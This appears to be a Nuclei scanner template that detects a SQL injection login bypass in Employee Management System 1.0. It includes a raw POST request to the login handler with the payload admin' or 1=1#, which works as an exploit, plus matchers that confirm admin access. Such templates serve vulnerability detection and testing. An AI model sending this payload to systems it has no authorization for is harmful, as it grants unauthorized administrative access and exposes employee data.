46 lines
1.3 KiB
YAML
46 lines
1.3 KiB
YAML
id: ems-sqli
|
|
|
|
info:
|
|
name: Employee Management System 1.0 - SQL Injection
|
|
author: arafatansari
|
|
severity: critical
|
|
description: |
|
|
Employee Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48882
|
|
- https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10.0
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: true
|
|
tags: ems,sqli,cms,auth-bypass,edb
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /process/aprocess.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Admin Panel'
|
|
- 'Log Out'
|
|
- 'Employee Management System'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/09/28
|